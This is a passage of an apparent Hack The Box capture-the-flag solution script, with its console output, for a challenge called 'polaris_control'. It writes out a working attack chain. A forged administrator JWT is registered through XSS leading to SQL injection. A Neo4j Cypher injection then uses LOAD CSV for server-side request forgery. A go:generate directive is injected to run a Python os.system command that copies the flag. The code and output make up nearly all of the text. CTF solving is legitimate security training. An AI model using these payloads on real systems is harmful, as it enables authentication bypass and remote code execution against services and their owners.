    """With a trusted administrator JWT, there is a Neo4J Cypher injectable query at POST panel/network endpoint. If using a LOAD CSV FROM, we can get the server to call /panel/server with a Golang Remote Code Execution payload that will be run with `go generate`.

    Injection Call:
        implant_connections = neo4j_interface.search_implant_connections(query)

    Reference: application/blueprints/panel.py
        @panel.route("/network", methods=["GET", "POST"])
        @administrator_middleware
    """
    # The injection on neo4j uses the load CSV function
    GOLANG_RCE = quote_plus(
        '"\n\t//go:generate python -c "import os;os.system(\'cp /flag* /app/application/static/flag.txt\')"\n\tvar a string = "'
    )
    neo4j_cypher_ssrf_payload = f"' OR True LOAD CSV FROM 'http://127.0.0.1:1337/panel/server?server_url={GOLANG_RCE}&token={new_jwt}' AS y RETURN '' AS identifier1, '' AS identifier2/*"
    data = {"query": neo4j_cypher_ssrf_payload}
    session.post(f"{CHALLENGE_URL}/panel/network", data=data, cookies={"jwt": new_jwt})


def get_flag():
    """Retrieve the flag."""
    flag = session.get(f"{CHALLENGE_URL}/static/flag.txt").text
    return flag


def start_flask_http(host_ip, host_port):
    """Start the Flask HTTP server.

    This function initializes a Flask application instance and runs the HTTP server
    on the specified host and port.
    """
    # Initialize a Flask application instance using the name of the current module (__name__).
    app = Flask(__name__, static_folder="", static_url_path="")

    # Run the Flask HTTP server on the specified host and port.
    # The server will start listening for incoming requests once this function is called.
    app.run(host=host_ip, port=host_port)


if __name__ == "__main__":
    # Create a new process to run the Flask HTTP server.
    print("[*] Starting Flask webserver ...")
    flask_process = Process(target=start_flask_http, args=(HOST_IP, HOST_PORT))
    flask_process.start()
    sleep(1)

    # Create Keypair / JWT
    print("[*] Creating JWT keypair for Trusted Provider ...")
    jwt_filename = "jwks.json"
    trusted_provider_url = f"{HOST_URL}/{jwt_filename}"
    priv_key = generate_keypair(jwt_filename)
    attacker_jwt = create_jwt(trusted_provider_url, priv_key, "administrator", "lean")

    # Register/update implant to upload image with unsafe CSP, XSS+SQli to add trusted JWT keypair.
    print("[*] Registering implant ...")
    implant_id, implant_token = post_register_implant()
    print(
        f"[+] Registered an implant with identifier {implant_id} / token: {implant_token}"
    )
    print("[*] Checking implant ...")
    get_check_implant(implant_id, implant_token)
    print("[*] Updating implant ...")
    post_update_implant(implant_id, implant_token)
    print(
        f"[+] Updated implant with Content Security Policy and XSS -> SQLi to add JWT keypair to Trusted Provider store."
    )

    # Achieve RCE via Neo4j Cypher Injection + Golang RCE
    print("[*] Updating network ...")
    post_panel_network(attacker_jwt)
    print(get_flag())

    # Terminate server
    sleep(2)
    flask_process.terminate()
$ python3 polaris_control.py
[*] Starting Flask webserver ...
* Serving Flask app 'polaris_control'
* Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on http://172.17.0.1:80
Press CTRL+C to quit
[*] Creating JWT keypair for Trusted Provider ...
[*] Registering implant ...
[+] Registered an implant with identifier 6f1b142a7b747ca0add408396921511347d75e6bb8b8aefa634385c403898516 / token: ea262cd385706afb6d16a905b32bf802ddbd49a18285b5bec7cacec0001bd993
[*] Checking implant ...
[*] Updating implant ...
[+] Updated implant with Content Security Policy and XSS -> SQLi to add JWT keypair to Trusted Provider store.
[*] Updating network ...
172.17.0.3 - - [-] "GET /jwks.json HTTP/1.1" 200 -
172.17.0.3 - - [-] "GET /jwks.json HTTP/1.1" 200 -
HTB{f4k3_fl4g_f0r_t3st1ng}